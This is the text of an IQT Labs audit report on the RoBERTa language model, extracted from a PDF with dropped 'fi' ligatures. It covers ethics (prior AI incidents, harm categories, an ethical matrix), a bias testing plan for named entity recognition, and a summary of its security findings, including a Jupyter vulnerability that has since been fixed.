RoBERTa Audit Checklist and Harms 1673077058

You might also like

Download as pdf or txt
Download as pdf or txt
You are on page 1of 43

AI Assurance Audit of RoBERTa,


an Open source, Pretrained
Large Language Model

December 2022

Andrea Brennen | abrennen@iqt.org


Ryan Ashley | rashley@iqt.org
Ricardo Calix | rcalix@rcalix.com
JJ Ben-Joseph | jj@tensorspace.ai
George Sieniawski | gsieniawski@iqt.org
Mona Gogia | mgogia@iqt.org
With input and contributions from BNH.AI

©
© 2022
2022 In-Q-Tel,
In-Q-Tel, Inc.
Inc. 1 of 29




Contents

I. Executive Summary
II. Contributors
III. IQT Labs’ approach to AI assurance auditing
IV. Audit checklist
V. Background on RoBERTa and other Large Language Models (LLMs)


VI. Ethics
- Prior AI incidents
- Potential harms
- Ethical matrix

VII. Bias
- What do we mean by bias?
- A high level bias testing plan for RoBERTa
- Experiment #1: Cross-lingual name-swap
- Experiment #2: Subwords & random sequences
- Experiment #3: Sentiment analysis

VIII. Security

- Whole system analysis
- Public disclosure process & timeline
- Third-party software dependencies

IX. Next steps & future work

Appendix A :: Responses to questions from the AI Ethics Framework for the IC


Appendix B :: RoBERTa XLM pretraining corpus
Appendix C :: Saisiyat Is Where It Is At! Insights Into Backdoors And Debiasing Of Cross Lin-
gual Transformers For Named Entity Recognition. Presented at 2022 IEEE International Con-
ference on Big Data.

© 2022 In-Q-Tel, Inc. 2 of 29














I. Executive Summary

This report summarizes key ndings from IQT Labs’ assurance audit of RoBERTa,1 an open source, pre-
trained, large language model (LLM). We conduced this audit from March-June 2022 and used the AI
Ethics Framework for the Intelligence Community2 as a guiding framework, building on the approach
we developed in 2021 during our audit 3 of FakeFinder,4 a deepfake detection tool.

One can use Large language models like RoBERTa to automate a range of tasks, from machine transla-
tion to text generation. However, these models are notoriously opaque. LLMs are trained on extremely
large text datasets scraped from the Internet and it is very dif cult to explain their predictions, to antic-
ipate how they will perform in a speci c context, or to determine how training data might lead to un-
desirable biases in model output. Recently, LLMs have received a tremendous amount of press, both
positive and negative. While many praise their transformative power5 (and some suggest they might
even be sentient 6), LLMs have also caused considerable concern because of their well-documented
potential to generate offensive, stereotyped, and racist text.7 Prior to this audit, RoBERTa underwent a
rigorous bias assessment, and one version of the model, RoBERTa large, scored the lowest of any test-
ed LLM in terms of proclivity to generate stereotyped text.8 However, this does not guarantee that one
can use RoBERTa without concern. In this audit, we set out to identify a range of potential risks associ-
ated with using this model.

There are many open source versions of RoBERTa available on the Internet. In this audit, we examined
2 pretrained versions from the Hugging Face transformer9 library: RoBERTa base 10 and RoBERTa
large.11 For some portions of the audit we considered RoBERTa’s performance, codebase, and security
in general; in others, we examined the model’s performance on a speci c task: Named Entity Recogni-
tion (NER). NER is an information extraction task where a model is used to automate the identi cation

1RoBERTa stands for “Robustly Optimized BERT pretraining Approach.” This model, released by Facebook, is an evolved version
of Google’s BERT model. https://arxiv.org/abs/1907.11692
2 https://www.dni.gov/index.php/features/2763-principles-of-arti cial-intelligence-ethics-for-the-intelligence-community 
3 Andrea Brennen & Ryan Ashley. AI Assurance Audit of FakeFinder, an Open-Source Deepfake Detection Tool. A public version of
this report is available at: https://assets.iqt.org/pdfs/IQTLabs_AiA_FakeFinderAudit_DISTRO__1_.pdf/web/viewer.html
4 FakeFinder is available open source, on github: https://github.com/IQTLabs/FakeFinder.
5 Kyle Wiggers, “The emerging types of language models and why they matter,” Tech Crunch, accessed June 23, 2022 at https://
techcrunch.com/2022/04/28/the-emerging-types-of-language-models-and-why-they-matter/
6Nitasha Tiku. “The Google engineer who thinks the company’s AI has come to life,” The Washington Post, accessed June 23,
2022 at https://www.washingtonpost.com/technology/2022/06/11/google-ai-lamda-blake-lemoine/
7Oscar Schwartz, “In 2016, Microsoft’s Racist Chatbot Revealed the Dangers of Online Conversation,” IEEE Spectrum, accessed
June 23, 2022 at https://spectrum.ieee.org/in-2016-microsofts-racist-chatbot-revealed-the-dangers-of-online-conversation
8Moin Nadeem and Siva Reddy, “StereoSet: A Measure of Bias in Language Models,” StereoSet, MIT, accessed May 16, 2022,
available at https://stereoset.mit.edu/.
9 https://huggingface.co/docs/transformers/model_doc/roberta
10 https://huggingface.co/roberta-base
11 https://huggingface.co/roberta-large

© 2022 In-Q-Tel, Inc. 3 of 29



fi
fi


fi

fi
fi

fi

of entities (i.e. persons, organizations, locations, etc.) that appear within a corpus of unstructured text.
For example, if an analyst wants to identify who sent or received emails in the Enron Email Dataset,12
she might use RoBERTa to perform NER on that dataset. We focused on NER because of its relevance
to intelligence analysis, but also, because much of the prior bias testing work on LLMs focuses only on
language generation (for example, via a chatbot interface) and it was not obvious to us how insights
from this prior work ought to inform our thinking about the risks of using RoBERTa for a different task,
such as NER. In our NER-focused testing, we examined RoBERTa XLM, 13 a version of the model that was
ne-tuned for this purpose.

Below, we list major ndings from our audit, all of which are described in more detail in the body of
this report. If you come across this work and want to get in touch with us — either to share your feed-
back or to collaborate on future audits — please do not hesitate to contact Andrea Brennen at abren-
nen@iqt.org and/or Ryan Ashley at rashley@iqt.org.

When assessing broad-context AI systems like LLMs, it is imperative to consider how a speci c
use case might enable particular types of harm. See Section VI. Ethics for more information.
• Lack of transparency into how LLM models work can undermine users’ con dence in RoBERTa.
• Differential performance across groups of entities (I.e. people from marginalized groups and/or with
less common names) can lead to systemic biases in model output.

Given the complexity of LLMs, not all biases can be characterized via statistical testing. Further-
more, focusing only on biases that can be measured quantitatively can, itself, be a source of bias.
We recommend combining rigorous quantitative testing with qualitative analysis of past and
potential real-world harms. See Section VII. Bias for more information.
• For most of the languages we tested in the NER task, we did not nd an indication of cross-language
bias that met the criteria of the four- fths rule. 14 The only bias we found that met this criteria was in
relation to Saisiyat (a language spoken in Taiwan).
• RoBERTa XLM identi ed most person-entities, regardless of language. It was only when the model
encountered uncommon subwords (i.e. from Saisiyat) or randomly generated subwords that it failed.
• In our testing, RoBERTa indicated negative sentiment when it encountered rare names. This could
indicate profound bias, depending on how the model is used.

To assess security risks, it is important to view a machine learning model as part of a holistic sys-
tem. See Section VIII. Security for more information.
• The majority of RoBERTa’s third-party software dependencies have a Snyk Health Score of at least 80,
a relatively high score. Very few packages raised concern upon initial inspection.
• In the course of our audit, we imagined users accessing RoBERTa via a Jupyter Notebook and dis-
covered it was possible to use the Jupyter API to view or change les that should be hidden, a vul-
nerability that malicious actors could use to gather sensitive information or gain unauthorized access
to a system. This issue was assigned two CVEs (for Jupyter Notebook and Jupyter Server, respective-
ly) and has since been xed.

12 https://www.cs.cmu.edu/~./enron/
13 https://huggingface.co/docs/transformers/model_doc/xlm-roberta
14 https://www.law.cornell.edu/cfr/text/29/1607.4

© 2022 In-Q-Tel, Inc. 4 of 29


fi





fi
fi
fi


fi



fi
fi


fi

fi

II. Contributors

This report was prepared by an interdisciplinary team of technologists from IQT Labs with expertise in
data science, security, software engineering, user experience design, and human-computer interaction.
The team collaborated with BNH.AI, a DC-based law rm specializing in the emerging area of AI risk
and liability assessment.

Ryan Ashley, Senior Software Engineer at IQT Labs, led the security portion of this audit, which resulted
in the discovery of two signi cant vulnerabilities in Jupyter notebooks and Jupyter server, open source
tools commonly used by data scientists. He also drafted, along with Charlie Lewis, what has since be-
come IQT Labs’ of cial public disclosure process for vulnerabilities discovered during our auditing
work. Senior Technologist George Sieniawski conducted the analysis of third-party software depen-
dencies in the RoBERTa codebase. Andrew Burt and Patrick Hall, partners at BNH.AI, formulated a high-
level bias testing plan for RoBERTa, drawing on prior work with the US National Institute of Standards
and Technology (NIST) to identify and categorize biases that tend to affect AI systems.15 Data Scientists
Ricardo Calix and JJ Ben-Joseph conducted the experiments described in the Bias section of this re-
port and were the lead authors on the paper included as Appendix C. Nina Lopatina (now at Spectrum)
helped design the original “Cross-lingual name-swap” experiment and provided guidance on available
labeled datasets for NER. The metrics and benchmark values used to evaluate bias in these experi-
ments draw on prior work by Andrea Brennen, Ryan Ashley, and BNH.AI completed during IQT Labs’
audit of FakeFinder16, an open source deepfake detection tool. Nikhil Mehta contributed to the re-
search on prior AI Incidents related to LLMs. Mona Gogia, IQT Labs’ Software Engineer, oversaw the
use and evaluation of commercial auditing tools developed by Robust Intelligence and Fiddler AI. At
Robust Intelligence, Jeffrey Sefa-Boakye, Girish Chandrasekar and Yaron Singer, were unbelievably
generous and gracious with their time and expertise, providing access and training to support our au-
dit. At Fiddler, Josh Rubin, Rajesh Ekambaram, and Krishna Gade, provided invaluable support for this
collaboration, even accelerating their planned timeline for releasing NLP explainability features. IQT’s
Tommy Jones, Murali Kanan, Esube Bekele, and A.J. Bertone, were instrumental in facilitating the rela-
tionships that led to these partnerships. Andrea Brennen, Deputy Director of IQT Labs, scoped and led
this audit, conducted the ethics assessment and assembled this report.

The team also wants to thank our USG partners who informed this work; Jr Korpa for sharing the cover
image on Unsplash; and all of the researchers, computer scientists, data scientists, engineers and soft-
ware developers who contributed to the invention of transformer models and the training and devel-
opment of RoBERTa.

15 See, e.g., Reva Schwartz et al., “NIST Special Publication 1270. Towards a Standard for Identifying and Managing Bias in Arti -
cial Intelligence,” National Institute of Standards and Technology, March 2022, available at https://doi.org/10.6028/NIST.SP.1270.
16AI Assurance Audit of FakeFinder, an Open-Source Deepfake Detection Tool. A public version of this report is available at:
https://assets.iqt.org/pdfs/IQTLabs_AiA_FakeFinderAudit_DISTRO__1_.pdf/web/viewer.html

© 2022 In-Q-Tel, Inc. 5 of 29


fi

fi



fi


f

III. IQT Labs’ approach to AI assurance auditing



When it comes to software, no tool is 100% reliable. As we incorporate machine learning (ML) and arti-
cial intelligence (AI) capabilities into software tools, we introduce new and unique modes of failure.
The information that AI/ML tools provide will never be perfect or complete and this means that our de-
cision to use these tools will never be without risk. This, in and of itself, is not a problem; we don’t need
perfection for AI/ML tools to be extremely useful. We do, however, need to understand the limitations
of these capabilities, particularly if we intend to use them in high stakes situations because it’s not only
the bene ts of AI that scale — it’s also the costs of errors.

The fundamental question driving IQT Labs’ AI Assurance work is this: for a given model or tool, how
can we be sure that we’re getting out of it what we think we’re getting? To answer this question,
we need capabilities and techniques that help us identify, characterize, and mitigate a variety of poten-
tial risks — ideally, before a tool is deployed.

Despite a rising concern about intentional (adversarial) attacks on AI/ML models (which often involve
sophisticated techniques for tricking models into making erroneous predictions) in IQT Labs’ prior
work,17 we’ve seen that today, many AI failures are unintentional. Today, incidents involving AI/ML are
more commonly caused by engineering mistakes, design oversights, incomplete training data,
changes in the environment, or user error — people using a tool incorrectly or thinking the results mean
something different from what they actually mean. Often, these incidents cannot be addressed (or pre-
vented) by technical xes alone, as they involve the people who use these tools and the policies, work-
ows, and expectations that guide their behavior. Even in the case of intentional incidents, i.e. those
caused by malicious attacks, we believe it is not suf cient to look at a model in the abstract. In many
cases, model-speci c attacks pose less of a concern than security vulnerabilities in the supporting
software infrastructure used to deploy and run models.

For these reasons, we audit AI/ML capabilities from a whole system, “sensor-to-solution” perspective.
This involves examining not only AI/ML models and their training data, but also, the supporting com-
ponents and infrastructure used to deploy and use a model in practice. For example, we consider the
way a model is implemented and accessed via software, the health and status of third-party software
dependencies, and the user experience of a tool or system. We’ve also found that assessing certain
risks and understanding potential ethical implications of a tool or system requires speci city about how
the tool or system will be used in practice. To carry out this work effectively, we need a diverse “AI Red
Team” comprised of people who have the diverse skills and expertise needed to examine a tool from
many perspectives — from safety and security, to bias, to transparency and interpretability, to product
and interface design, to potential ethical implications. With each audit we do, we continue to re ne our
approach, with the goal of developing effective, pragmatic, repeatable, and generalizable auditing
techniques that help us build trust in AI tools, when that trust is warranted.

Andrew Burt, Patrick Hall, Andrea Brennen. “When AI Fails: An Overview of Common Failure Modes for Real-World Deploy -
17

ments.” Spring 2021.

© 2022 In-Q-Tel, Inc. 6 of 29



fi
fl
fi

fi
fi


fi

fi
fi

IV. Audit checklist

Ethics Assessment
Analyze prior AI incidents involving LLMs and NLP systems.
Outline potential harms.
Construct an ethical matrix, focused on a speci c use case (Named Entity Recognition).
Respond to questions from the AI Ethics Framework on “Purpose: Understanding Goals & Risks.”

Bias Testing
Develop a high-level bias testing plan.
Select type(s) of bias to test for quantitatively.
De ne metrics for measuring bias.
Design & conduct experiment(s).
Analyze & document results.
Respond to questions from the AI Ethics Framework on “Mitigating Undesired Bias & Ensuring Ob-
jectivity.”

Security Analysis
Identify third-party software package dependencies needed to run the AI/ML tool.
Run health scans of packages using Snyk and create a “Nutrition Label” to visualize health scores.
Inspect packages with scores below a particular threshold.
Stand up version of the tool, following available documentation and con guration instructions.
Search CVE database for known vulnerabilities
Test vulnerabilities to explore potential exploits.
If new vulnerabilities are discovered:
Develop proof of concept code and steps to reproduce.
Communicate the nature of the vulnerability to maintainers.
File for a CVE with GitHub18 to allow for independent veri cation of vulnerability.
Create potential patches/ xes and offer them to maintainers for discussion and review.
Observe a 60-90 day embargo period to allow for remediation.
Respond to questions from the AI Ethics Framework on “Testing your AI.”

18 https://www.cve.org/PartnerInformation/ListofPartners/partner/GitHub_M

© 2022 In-Q-Tel, Inc. 7 of 29



fi

fi

fi



fi

fi

V. Background on RoBERTa and other LLMs


Natural Language Processing (NLP) is a sub eld of Arti cial Intelligence (AI) that involves human lan-
guage processing tasks, such as machine translation (i.e. Google Translate), natural language genera-
tion (i.e. chatbots), speech recognition (i.e. Alexa), sentiment analysis (is this tweet positive or
negative?), content moderation (which requires identifying content that is inappropriate or offensive),
and Named Entity Recognition (predicting which words in a sentence belong to different categories.)
NLP capabilities have exploded in recent years, in part because of the availability of open source, pre-
trained Large Language Models (LLMs). LLMs are trained on very large amounts of data scraped from
the Internet and digital platforms. This requires substantial computing resources, power, and data that
in the past, have only been available to large organizations like Google and Facebook. However, now
that pretrained LLMs are available through open source libraries, repositories, and cloud services,
powerful NLP capabilities are widely accessible and users no longer need to build their own models
from scratch.

In many language models, input text is converted to a vector (i.e. numerical representation) by a com-
ponent called an encoder. When the model makes a prediction, it is also in the form of a numerical
representation (another vector), but a decoder handles the processing of that vector into something
that is meaningful to a human (i.e. output text). Pre-2017, encoders often compressed input data of
varying lengths and sizes (i.e. anything from a word to a sentence to an entire novel) into a single con-
text vector that could be passed from an encoder to a decoder. While this approach was computation-
ally ef cient, it led to signi cant information loss. In 2017, researchers at Google Brain wrote a paper
called “Attention is all you need”19 which described an alternative approach — using something called
an attention mechanism to pass multiple vectors or “hidden states” between a model’s encoder and
decoder. Transformers, a class of deep learning models that use this attention mechanism, have since
revolutionized the eld of natural language processing (NLP).

In 2018, Jacob Devlin and his colleagues at Google created a LLM called BERT20 (Bidirectional Encoder
Representations with Transformers), which they released to open source in 2019 as part of the Tensor-
Flow project. The pretraining process for BERT was based on 2 learning objectives: a “Mask Language
Model (MLM) mechanism" and a “Next Sentence Prediction (NSP) mechanism,” which BERT’s creators
believed were responsible for the models’s high performance. Subsequently, Facebook engineers cre-
ated another LLM, RoBERTa21 (Robustly Optimized BERT Pretraining Approach) which was, essentially, a
modi ed version of BERT. Arguing that BERT was under-trained, RoBERTa’s developers offered several
improvements including: increasing the training data (in the pretraining phase) from 16 GB to 160 GB;
training for longer, with a larger batch size, and with inputs bigger than 1 sentence; adding architectur-

19Vaswani, Ashish, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Łukasz Kaiser, and Illia Polosukhin.
"Attention is all you need." Advances in neural information processing systems 30 (2017).
20Jacob Devlin, Ming-Wei Chang, Kenton Lee, Kristina Toutanova. “BERT: Pre-training of Deep Bidirectional Transformers for
Language Understanding.” https://arxiv.org/abs/1810.04805
21Yinhan Liu, Myle Ott, Naman Goyal, Jingfei Du, Mandar Joshi, Danqi Chen, Omer Levy, Mike Lewis, Luke Zettlemoyer, Veselin
Stoyanov. “RoBERTa: A Robustly Optimized BERT Pretraining Approach.” https://arxiv.org/abs/1907.11692

© 2022 In-Q-Tel, Inc. 8 of 29



fi
fi


fi
fi
fi


fi


al components such as neural network layers and attention heads; and removing the NSP objective.
They subsequently released RoBERTa on GitHub.22

With training, both RoBERTa and BERT can predict hidden or “masked” sections of text within an unan-
notated language example. For example, given the input “I bought <mask> at the supermarket,”
RoBERTa predicts “groceries,” “some,” “everything,” “it,” and “them” as plausible objects of “bought”.
RoBERTa has performed more accurately than BERT in many benchmark tasks (SQUAD, RACE, etc.) and
RoBERTa’s developers have concluded that more training data could leader to even further improve-
ments in model performance, as long as model capacity (such as architecture) is also increased. Other
notable open-source LLMs include Open AI’s GPT-2,23 GPT-3,24 and PaLM.25

Multiple versions of RoBERTa are available through the Hugging Face transformers library,26 a popular
curated repository for open source NLP models, tools and APIs. During this audit, we examined:
• RoBERTa-base,27 which has 123 million model parameters;
• RoBERTa-large,28 which has 354 million parameters; and
• RoBERTa XLM (XLM-R), a cross-lingual version, ne-tuned for Named Entity Recognition.

Named Entity Recognition (NER) is an information extraction task where a model is used to automate
the identi cation of entities (i.e. people, organizations, etc.) that appear within a corpus of unstructured
text. For example, if we use RoBERTa for NER on the sentence: “Andrea’s birthday is March 17” we
would expect RoBERTa to recognize “Andrea” as a named entity.

The RoBERTa XLM model was trained to recognize three types of entities: locations (LOC), organiza-
tions (ORG), and persons (PER). However, in our testing for this audit we only used the person (PER)
tags. Prior to ne-tuning for NER, RoBERTa XLM was pre-trained on text from 100 languages that came
from a common crawl and had a size of around 2.5 terabytes. However, not all languages in the train-
ing corpus were equally represented in terms of the amount of text. English was dominant, accounting
for 300 GB, followed by Russian with around 270 GB, while other languages like Afrikaans had signi -
cantly less. The NER ne-tuning for RoBERTa XLM was done with various multi-language NER data sets,
some of which were related to the original Conll NER datasets.29 According to the model’s documenta-
tion, NER ne-tuning was performed using Arabic, German, English, Spanish, French, Italian, Latvian,
Dutch, Portuguese, and Chinese.

22 https://github.com/facebookresearch/fairseq/blob/main/examples/roberta/README.md
23 https://openai.com/blog/tags/gpt-2/
24 https://openai.com/api/
25 https://arxiv.org/abs/2204.02311
26 https://github.com/huggingface
27 https://huggingface.co/roberta-base
28 https://huggingface.co/roberta-large
29 https://huggingface.co/datasets/conll2003

© 2022 In-Q-Tel, Inc. 9 of 29


fi
fi
fi

fi

fi

fi

VI. Ethics
Broad-context AI systems like LLMs can cause a range of harms to a variety of stakeholders, depending
on how they are used. It is not always easy to identify potential harms or the downstream effects of de-
ploying a new tool, but researchers have suggested that structured discussions are one way to uncover
opaque harms in complex AI systems.30 In prior work, we used an ethical matrix 31 to help us identify
potential concerns related to the use of FakeFinder, a deepfake detection tool.32 In this audit, we aug-
mented this approach in two ways: by researching past incidents involving LLMs and by outlining gen-
eral harms that could arise in the use of models like RoBERTa.

Prior AI Incidents
Consulting public records of past AI incidents can be tremendously informative and the straightfor-
ward goal of mitigating against known failure modes should be a primary focus of risk management
activities for AI systems. During this audit, we consulted the AI Incident Database, 33 a curated reposito-
ry of AI incidents covered in the public news media, searching for incidents associated with the key-
words “NLP” and “language.” (We also tried “transformers”; “LLM”; “named entity recognition”; and
“intelligence analysis,” but these were less fruitful.) Below, we describe some notable incidents.

In 2016, Microsoft unveiled Tay.AI, a twitter AI chat-bot. Tay.AI replied to users’ tweets and could carry
out conversations with them on the platform. Within several hours of deployment, however, users be-
gan engaging in offensive conversations with Tay which, in turn, prompted Tay to respond in a similar
fashion — tweeting misogynist, racist, and antisemitic remarks. Tay caused harm both to users and to
Microsoft, in part because of two notable issues with how it was implemented. First, Tay’s use case was
broad and unde ned — the chatbot interacted with anyone on twitter, about anything said to it. Sec-
ond, Tay’s engineers clearly did not protect against adversarial inputs, where users could exploit the
chatbot to tweet offensive content. 

In 2017 Google Jigsaw released Perspective API, an NLP tool trained on a dataset of comments from
the New York Times and other publications, in an attempt to aid content moderation efforts by assign-
ing phrases a “toxicity” rating. Users, however, found signi cant bias in Perspective’s ratings. For exam-
ple, phrases that mentioned minority identity groups, without expressing hate, were more likely to at-
tain a higher toxicity rating than similar phrases that mentioned non-minority groups.
 

30Margarita Boyarskaya, Alexandra Olteanu, and Kate Crawford, “Overcoming failures of imagination in AI infused system devel-
opment and deployment,” arXiv preprint arXiv:2011.13416 (2020), available at https://arxiv.org/abs/2011.13416.
31This approach is described by Cathy O'Neil and Hanna Gunn in "Near-Term Arti cial Intelligence and the Ethical Matrix" (a
chapter from S. Matthew Liao's Ethics of Arti cial Intelligence.) See also: https://blog.dataiku.com/algorithmic-stakeholders-an-
ethical-matrix-for-ai
32Andrea Brennen & Ryan Ashley. AI Assurance Audit of FakeFinder, an Open-Source Deepfake Detection Tool.
https://assets.iqt.org/pdfs/IQTLabs_AiA_FakeFinderAudit_DISTRO__1_.pdf/web/viewer.html
33 Sean McGregor, Arti cial Intelligence Incident Database, available at https://incidentdatabase.ai

© 2022 In-Q-Tel, Inc. 10 of 29

fi
fi

fi



fi

fi




Also in 2017, Facebook’s machine translation (MT) model mistranslated the phrase “good morning”
from a user’s post in Arabic to “attack them.” Israeli authorities noticed this post and arrested the user
without checking the original post or verifying the translation. While it is dif cult to determine whether
this mistranslation was a result of bias, it speaks to the dangers of ascribing a high degree of con -
dence to the outputs of LLMs without veri cation.
 
Many of the issues these incidents raise are not speci c to LLMs. Bias, unde ned and overly-broad use
cases, unveri ed outputs, and exploitation are prevalent across many classes of ML models. However,
the speci c contexts in which NLP and LLM models are deployed allow their impacts and harms to be
particularly potent to users as well as to the organizations that develop or deploy them. When evaluat-
ing risks associated with these models, it is imperative to consider how a speci c use case might
enable particular types of harms.

Potential Harms
Before considering RoBERTa in the context of a speci c use case, we worked with BNH.AI to identify
potential harms that might arise from the use of AI systems broadly, including LLMs. Below, we’ve out-
lined general categories of harm, as well as speci c harms related to digital content.34 It is worth noting
that general harms can arise from vague mechanisms, such as widely held feelings that LLMs are bi-
ased, arising from media coverage of the topic. Content-related harms may remain con ned to interac-
tions on the internet or other media, but can also spill over to more general harms.

General Categories of Harm:


● Economic: An AI system may reduce the economic opportunity or value of some activity (e.g., an
AI-facilitated job interview that is not designed to interact with people with disabilities unfairly di-
minishes economic opportunities for members of that group). 35
● Physical: An AI system could hurt or kill someone (e.g., a self-driving car hits a pedestrian).36
● Psychological: An AI system could cause mental or emotional distress (e.g., a content lter fails
to detect self-harm content).37
● Reputational: An AI system could diminish the reputation of an individual or organization (e.g., a
chatbot makes embarrassing or politically incorrect statements).38

34These harms align closely with the rubric used in the rst bias bug bounty, conducted by the META team at Twitter on Twitter’s
own image saliency algorithm. See HackerOne, “Twitter Algorithmic Bias,” HackerOne (July 2021), available at https://
hackerone.com/twitter-algorithmic-bias?type=team.
35Associated Press, “U.S. warns of discrimination in using arti cial intelligence to screen job candidates,” NPR (May 12, 2022),
available at https://www.npr.org/2022/05/12/1098601458/arti cial-intelligence-job
-discrimination-disabilities.
36David Shepardson, “In Review of Fatal Arizona Crash, U.S. Agency Says Uber Software Had Flaws,” Reuters (Nov. 5, 2019),
available at https://reut.rs/3x3r5He
37Megan A. Moreno, Adrienne Ton, Ellen Selkie, and Yolanda Evans, “Secret society 123: Understanding the language of self-
harm on Instagram” Journal of Adolescent Health 58, no. 1 (2016): 78-84, available at https://www.ncbi.nlm.nih.gov/pmc/arti-
cles/PMC5322804/.
38 Joseph Hincks, “Chinese Firm Reins in Rogue Chatbots After Unpatriotic Chatter,” TIME (Aug. 3, 2017), available at https://
time.com/4885341/china-tencent-rogue-chatbots/.

© 2022 In-Q-Tel, Inc. 11 of 29

fi
fi


fi
fi

fi
fi

fi
fi
fi



fi
fi

fi
fi
fi

f

Harms related to Digital Content:
● Denigration: Content might be derogatory or offensive (e.g., a chatbot generates racial or ho-
mophobic slurs).39
● Erasure: Content challenging dominant social paradigms or past harms suffered by marginalized
groups could be erased (e.g., a recommendation algorithm suppresses content containing the
#blacklivesmatter hashtag).
● Ex-nomination: Notions like whiteness or heterosexuality may be treated as human norms (e.g.,
a search system returns all white men on the rst page of results for the acronym “CEO”).
● Mis-recognition: A person’s identity or humanity may not be recognized (e.g., a model fails to
recognize entities belonging to marginalized groups).
● Stereotyping: Individual characteristics are assigned to all members of a group (e.g., a model
automatically associates “woman” with “homemaker”).
● Underrepresentation: A sensitive attribute within a dataset category may not be represented
(e.g., training data includes few examples associated with a marginalized demographic group).

Ethical Matrix
Having identi ed these potential harms, we then used an ethical matrix to help us identify speci c
harms related to the use of RoBERTa for Named Entity Recognition, in the context of data analysis.

The ethical matrix is a structured thought exercise designed to help people without formal training in
ethics think counterfactually about how an AI tool might impact different stakeholders in different ways.
The aim is to identify a range of stakeholder groups that might be impacted by an AI system and then
to think through what types of harm they might experience. There are multiple ways to construct the
columns of an ethical matrix, but we decided to focus on what could go wrong, in the event of different
types of errors.

The matrix on the following page includes 6 stakeholder groups (one per row): RoBERTa developers,
RoBERTa users (i.e. analysts), an organization deploying RoBERTa (i.e. where the analysts work), people
listed as named entities in the data corpus being analyzed, people listed as named entities in RoBER-
Ta’s training data, and the general public. We include separate columns for false positives (i.e. RoBERTa
incorrectly identi es a word in the text corpus as a person-entity) and false negatives (i.e. RoBERTa fails
to identify a person who is mentioned in the text corpus). In a third column, we track harms that might
arise even when the model is working as expected (i.e. RoBERTa correctly identi es a person in the text
corpus as a person-entity.)

Davey Alba, “It’s Your Fault Microsoft’s Teen AI Turned Into Such a Jerk,” WIRED Magazine (March 25, 2016), available at https://
39

www.wired.com/2016/03/fault-microsofts-teen-ai-turned-jerk/.

© 2022 In-Q-Tel, Inc. 12 of 29


fi

fi

fi



fi

fi

© 2022 In-Q-Tel, Inc. 13 of 29







VII. Bias
In this section we offer a high-level bias testing plan for RoBERTa, developed in partnership with BN-
H.AI and informed by NIST Special Publication 1270: “Towards a Standard for Identifying and Manag-
ing Bias in Arti cial Intelligence.” 40 We then summarize results from three experiments conducted to
assess cross-language bias when RoBERTa is used for NER. These experiments are discussed in more
detail in a technical paper written by our team: Saisiyat Is Where It Is At! Insights Into Backdoors And
Debiasing Of Cross Lingual Transformers For Named Entity Recognition. (See Appendix C).

What do we mean by bias?


Recent guidance from the US National Institute of Standards and Technology (NIST) outlines three ma-
jor types of bias41 that tend to affect AI systems: systemic, human, and statistical.42

●Systemic Biases: Historical, social, and institutional biases are often intrinsic to LLM training data
and depending on model design choices, these systemic biases can affect the output of AI sys-
tems. In some cases, systemic biases may be overt and explicit, for example, if an LLM was repur-
posed to generate harmful or offensive misinformation that targeted a particular demographic
group. More commonly, however, demographic information is unintentionally incorporated into AI
system development, but still leads to differential outcomes across demographic groups. For ex-
ample, if an LLM is trained on a dataset containing a majority of named entities that are white and
male, the model might nd more white male named entities in a corpus of text data.

●Human Biases: Behavioral and cognitive biases affect individuals and groups of people. Groups
of data scientists may succumb to con rmation bias43, the Dunning-Kruger effect44, funding bias45,
or groupthink 46, leading to inappropriate and overly optimistic design choices that can cause unin-
tended harms. Cognitive biases like the availability heuristic47 and anchoring48 can also in uence
system design choices as well as users’ interpretation of system outcomes.

●Statistical Biases: Statistical biases emerge from methodological, computational, or mathemati-


cal problems in the speci cation of AI systems. Common types of statistical biases include concept

40Reva Schwartz et al., “NIST Special Publication 1270. Towards a Standard for Identifying and Managing Bias in Arti cial Intelli-
gence,” National Institute of Standards and Technology, March 2022, available at https://doi.org/10.6028/NIST.SP.1270.

The International Standards Organization (ISO) de nes bias as “the degree to which a reference value deviates from the truth.”
41

We have focused, speci cally, on biases that may give rise to varying outcomes across demographic groups.
42Reva Schwartz et al., “NIST Special Publication 1270. Towards a Standard for Identifying and Managing Bias in Arti cial Intelli-
gence,” National Institute of Standards and Technology, March 2022, available at https://doi.org/10.6028/NIST.SP.1270.
43 A cognitive bias where people tend to prefer information that aligns with, or con rms, their existing beliefs.
44 A cognitive bias—the tendency of people with low ability in a given area or task to overestimate their self-assessed ability.
45 A bias toward highlighting or promoting results that support or satisfy the funding agency or nancial supporter of a project.
46A psychological phenomenon that occurs when people in a group tend to make nonoptimal decisions based on their desire
to conform to the group or fear of dissenting with the group.
47 A mental shortcut whereby people tend to over weight what comes easily or quickly to mind in decision-making processes.
48 A cognitive bias—when a particular reference point or anchor has an undue effect on people’s decisions.

© 2022 In-Q-Tel, Inc. 14 of 29


fi

fi

fi
fi
fi

fi


fi

fi

fl

fi
fi

drift49 , error propagation 50, feedback loops51, and unrepresentative training data52 . One typical
indicator of statistical bias in AI systems is differential validity — differential performance quality
across demographic groups. This can unfortunately be challenging to x, as there is a documented
tension between maximizing system performance and positive outcomes across demographic
groups53 . Statistical biases may lead to signi cant failures of AI systems, for example, when concept
drift in new data renders a system valueless or when feedback loops lead to high volumes of erro-
neous predictions.

While any demographic group may experience discrimination, marginalized groups are more likely to
bear the brunt of resulting harms. Below we list commonly marginalized groups and best practices for
statistical bias testing.

●Age: Older people; it is best practice to use age less than 40 as a control group.
●Disability: Those with physical, mental, or emotional disabilities; it is best practice to use those
without disabilities as the control group.
●Language: Languages other than English and non-Latin scripts; it is best practice to use English
language and Latin script text as a control group.
●Race and Ethnicity: Races and ethnicities other than white people, including more than one
race; it is frequently a best practice to use white people as a control group.
●Sex and Gender: Sexes and genders other than cisgender men, including non-binary genders; it
is a best practice to use cisgender men as the control group.

Some biases will be apparent through statistical testing and the application of numeric thresholds.
However, because LLMs are so complex, bias cannot always be characterized via statistical test results.
Additionally, focusing only on biases that can be measured quantitatively can, itself, be a source of
bias.54 We recommend combining rigorous quantitative testing with qualitative analysis of past and
potential harms (for example, as discussed in the previous Ethics section of this report.)

A high-level bias testing plan for RoBERTa


Measuring bias in LLMs is a dif cult and somewhat ill de ned task. In this section we outline potential
approaches for testing LLMs for bias, through the lens of NER.

49Use of a system outside the planned domain of application, often resulting from differences in input data distributions at train-
ing versus deployment, and a common cause of performance gaps between laboratory settings and the real world.
50Arises when applications that are built with machine learning (ML) are used to generate inputs for other ML algorithms. If the
output is biased or erroneous in any way, these issues may be inherited by downstream systems.
